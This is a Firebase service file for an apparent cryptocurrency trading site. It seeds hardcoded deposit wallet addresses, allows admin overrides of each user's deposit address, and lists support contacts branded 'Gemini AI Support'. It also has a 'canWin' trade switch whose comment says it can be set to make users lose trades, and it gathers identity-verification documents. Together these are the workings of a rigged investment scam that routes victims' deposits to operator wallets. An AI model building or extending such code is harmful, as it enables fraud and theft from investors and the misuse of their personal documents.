import { db } from '../firebase/config';
import { doc, getDoc, setDoc, updateDoc, serverTimestamp, collection, getDocs, deleteDoc, onSnapshot } from 'firebase/firestore';

// Clean up old collections and create new structure
export const cleanupAndInitializeFirebase = async () => {
  try {
    console.log('Starting Firebase cleanup and initialization...');

    // Delete old collections if they exist
    const oldCollections = ['wallets', 'customerSupport', 'admin'];
    for (const collectionName of oldCollections) {
      try {
        const querySnapshot = await getDocs(collection(db, collectionName));
        const deletePromises = [];
        querySnapshot.forEach((document) => {
          deletePromises.push(deleteDoc(doc(db, collectionName, document.id)));
        });
        await Promise.all(deletePromises);
        console.log(`Deleted old collection: ${collectionName}`);
      } catch (error) {
        console.log(`Collection ${collectionName} doesn't exist or already cleaned`);
      }
    }

    // Initialize default wallet addresses
    const defaultWalletsRef = doc(db, 'config', 'defaultWallets');
    const defaultWalletsData = {
      BTC: 'bc1qg5wpm5u0ucnp0sjfydtdua0rnrcz73yc29t94u',
      ETH: '0xFAef238bA1ffBb72A30F3A8d43EFfcf0fbE1313a',
      SOL: 'GA7r44Z69tysfgZdQ36RfTtDP35NceG3vW9ygbG17sGe',
      XRP: 'rJm6bXoFmSTZFuKJKHo8a8hdGuENhoDezT',
      USDT: '0xFAef238bA1ffBb72A30F3A8d43EFfcf0fbE1313a',
      USDC: '0xFAef238bA1ffBb72A30F3A8d43EFfcf0fbE1313a',
      updatedAt: serverTimestamp()
    };
    await setDoc(defaultWalletsRef, defaultWalletsData, { merge: true });
    console.log('Initialized default wallet addresses');

    // Initialize customer service contacts
    const customerServiceRef = doc(db, 'config', 'customerService');
    const customerServiceData = {
      telegram: {
        username: 'GeminiAI_CS',
        displayName: 'Gemini AI Support',
        url: 'https://t.me/GeminiAI_CS'
      },
      whatsapp: {
        number: '+1234567890',
        displayName: 'Gemini AI Support'
      },
      email: {
        address: 'support@gemini-ai-trading.com',
        displayName: 'Gemini AI Support'
      },
      updatedAt: serverTimestamp()
    };
    await setDoc(customerServiceRef, customerServiceData, { merge: true });
    console.log('Initialized customer service contacts');

    // Initialize trade settings
    const tradeSettingsRef = doc(db, 'config', 'tradeSettings');
    const tradeSettingsData = {
      canWin: true, // Set to false to make users lose trades
      updatedAt: serverTimestamp()
    };
    await setDoc(tradeSettingsRef, tradeSettingsData, { merge: true });
    console.log('Initialized trade settings');

    console.log('Firebase cleanup and initialization completed successfully!');
    return true;
  } catch (error) {
    console.error('Error during Firebase cleanup and initialization:', error);
    throw error;
  }
};

// ========== WALLET ADDRESS MANAGEMENT ==========

// Get default wallet addresses
export const getDefaultAddresses = async () => {
  try {
    const docRef = doc(db, 'config', 'defaultWallets');
    const docSnap = await getDoc(docRef);

    if (docSnap.exists()) {
      const data = docSnap.data();
      // Remove metadata fields
      const { updatedAt, ...addresses } = data;
      return addresses;
    } else {
      console.warn('Default wallets document not found, initializing...');
      await cleanupAndInitializeFirebase();
      return await getDefaultAddresses();
    }
  } catch (error) {
    console.error('Error getting default wallet addresses:', error);
    throw error;
  }
};

// Update default wallet addresses (admin only)
export const updateDefaultAddresses = async (updates) => {
  try {
    const docRef = doc(db, 'config', 'defaultWallets');
    await updateDoc(docRef, {
      ...updates,
      updatedAt: serverTimestamp()
    });
    console.log('Default wallet addresses updated successfully');
    return true;
  } catch (error) {
    console.error('Error updating default wallet addresses:', error);
    throw error;
  }
};

// Listen to default wallet addresses (realtime)
export const listenToDefaultAddresses = (onChange, onError) => {
  const docRef = doc(db, 'config', 'defaultWallets');
  return onSnapshot(
    docRef,
    async (snapshot) => {
      if (!snapshot.exists()) {
        // Check old 'wallets' document for backwards compatibility
        const oldRef = doc(db, 'config', 'wallets');
        const oldSnap = await getDoc(oldRef);
        if (oldSnap.exists()) {
          const data = oldSnap.data() || {};
          const { updatedAt, createdAt, ...addresses } = data;
          // Migrate to new document
          await setDoc(docRef, { ...addresses, migratedAt: serverTimestamp() });
          onChange(addresses);
          return;
        }
        // Auto-create the document with empty addresses if it doesn't exist
        // This ensures the collection exists and users don't see errors
        const defaultAddresses = {
          USDT: '',
          USDC: '',
          BTC: '',
          ETH: '',
          XRP: '',
          SOL: '',
          BNB: '',
          ADA: '',
          createdAt: serverTimestamp()
        };
        try {
          await setDoc(docRef, defaultAddresses);
          onChange({});
        } catch (err) {
          console.error('Failed to create defaultWallets document:', err);
          onChange({});
        }
        return;
      }

      const data = snapshot.data() || {};
      const { updatedAt, createdAt, migratedAt, ...addresses } = data;
      onChange(addresses);
    },
    (error) => {
      if (typeof onError === 'function') {
        onError(error);
      } else {
        console.error('Error listening to default wallet addresses:', error);
      }
    }
  );
};

// Get user's wallet addresses (falls back to defaults if not set)
export const getUserAddresses = async (userId) => {
  try {
    const userProfileRef = doc(db, 'userProfiles', userId);
    const userProfileSnap = await getDoc(userProfileRef);

    if (userProfileSnap.exists()) {
      const addresses = userProfileSnap.data().walletAddresses || {};
      if (Object.keys(addresses).length > 0) return addresses;
    }

    // Fall back to default addresses
    return await getDefaultAddresses();
  } catch (error) {
    console.error('Error getting user wallet addresses:', error);
    throw error;
  }
};

// Update user's wallet addresses
export const updateUserAddresses = async (userId, updates) => {
  try {
    const userProfileRef = doc(db, 'userProfiles', userId);
    await updateDoc(userProfileRef, {
      walletAddresses: updates,
      updatedAt: serverTimestamp()
    });
    console.log('User wallet addresses updated successfully');
    return true;
  } catch (error) {
    console.error('Error updating user wallet addresses:', error);
    throw error;
  }
};

// Reset user's wallet addresses to defaults (clears override, falls back to config/defaultWallets)
export const resetUserAddresses = async (userId) => {
  try {
    const userProfileRef = doc(db, 'userProfiles', userId);
    await updateDoc(userProfileRef, {
      walletAddresses: {},
      updatedAt: serverTimestamp()
    });
    console.log('User wallet addresses reset to defaults');
    return true;
  } catch (error) {
    console.error('Error resetting user wallet addresses:', error);
    throw error;
  }
};

// ========== CUSTOMER SERVICE MANAGEMENT ==========

// Get customer service contacts
export const getCustomerServiceContacts = async () => {
  try {
    const docRef = doc(db, 'config', 'customerService');
    const docSnap = await getDoc(docRef);

    if (docSnap.exists()) {
      const data = docSnap.data();
      // Remove metadata fields
      const { updatedAt, ...contacts } = data;
      return contacts;
    } else {
      console.warn('Customer service document not found, initializing...');
      await cleanupAndInitializeFirebase();
      return await getCustomerServiceContacts();
    }
  } catch (error) {
    console.error('Error getting customer service contacts:', error);
    throw error;
  }
};

// Update customer service contacts (admin only)
export const updateCustomerServiceContacts = async (updates) => {
  try {
    const docRef = doc(db, 'config', 'customerService');
    await updateDoc(docRef, {
      ...updates,
      updatedAt: serverTimestamp()
    });
    console.log('Customer service contacts updated successfully');
    return true;
  } catch (error) {
    console.error('Error updating customer service contacts:', error);
    throw error;
  }
};

// ========== TRADE SETTINGS MANAGEMENT ==========

// Get trade settings
export const getTradeSettings = async () => {
  try {
    const docRef = doc(db, 'config', 'tradeSettings');
    const docSnap = await getDoc(docRef);

    if (docSnap.exists()) {
      const data = docSnap.data();
      // Remove metadata fields
      const { updatedAt, ...settings } = data;
      return settings;
    } else {
      console.warn('Trade settings document not found, initializing...');
      await cleanupAndInitializeFirebase();
      return await getTradeSettings();
    }
  } catch (error) {
    console.error('Error getting trade settings:', error);
    throw error;
  }
};

// Update trade settings (admin only)
export const updateTradeSettings = async (updates) => {
  try {
    const docRef = doc(db, 'config', 'tradeSettings');
    await updateDoc(docRef, {
      ...updates,
      updatedAt: serverTimestamp()
    });
    console.log('Trade settings updated successfully');
    return true;
  } catch (error) {
    console.error('Error updating trade settings:', error);
    throw error;
  }
};

// Check if trades can win
export const canTradesWin = async () => {
  try {
    const settings = await getTradeSettings();
    return settings.canWin !== false; // Default to true if not set
  } catch (error) {
    console.error('Error checking trade win status:', error);
    return true; // Default to winning if error
  }
};

// ========== USER VERIFICATION MANAGEMENT ==========

// Submit verification request
export const submitVerificationRequest = async (userId, userEmail, files, note = '') => {
  try {
    const verificationRef = doc(collection(db, 'verificationRequests'));
    await setDoc(verificationRef, {
      userId,
      userEmail,
      status: 'pending',
      submittedAt: serverTimestamp(),
      note: note || '',
      files: files.map(f => ({ name: f.name, type: f.type })),
      reviewedAt: null,
      reviewerId: null,
      rejectionReason: null
    });
    console.log('Verification request submitted successfully');
    return verificationRef.id;
  } catch (error) {
    console.error('Error submitting verification request:', error);
    throw error;
  }
};

// Get verification requests (admin only)
export const getVerificationRequests = async () => {
  try {
    const querySnapshot = await getDocs(collection(db, 'verificationRequests'));
    const requests = [];
    querySnapshot.forEach((doc) => {
      requests.push({ id: doc.id, ...doc.data() });
    });
    return requests.sort((a, b) => b.submittedAt?.toDate() - a.submittedAt?.toDate());
  } catch (error) {
    console.error('Error getting verification requests:', error);
    throw error;
  }
};

// Update verification request status (admin only)
export const updateVerificationRequestStatus = async (requestId, status, reviewerId, rejectionReason = null) => {
  try {
    const requestRef = doc(db, 'verificationRequests', requestId);
    const updateData = {
      status,
      reviewedAt: serverTimestamp(),
      reviewerId
    };

    if (status === 'rejected' && rejectionReason) {
      updateData.rejectionReason = rejectionReason;
    }

    await updateDoc(requestRef, updateData);

    // Update user verification status
    const requestSnap = await getDoc(requestRef);
    if (requestSnap.exists()) {
      const userId = requestSnap.data().userId;
      const userRef = doc(db, 'users', userId);

      await updateDoc(userRef, {
        verification_status: status,
        ...(status === 'rejected' && rejectionReason ? { verification_rejection_reason: rejectionReason } : {}),
        ...(status === 'verified' ? { verification_submitted_at: null } : {})
      });
    }

    console.log(`Verification request ${requestId} updated to ${status}`);
    return true;
  } catch (error) {
    console.error('Error updating verification request status:', error);
    throw error;
  }
};
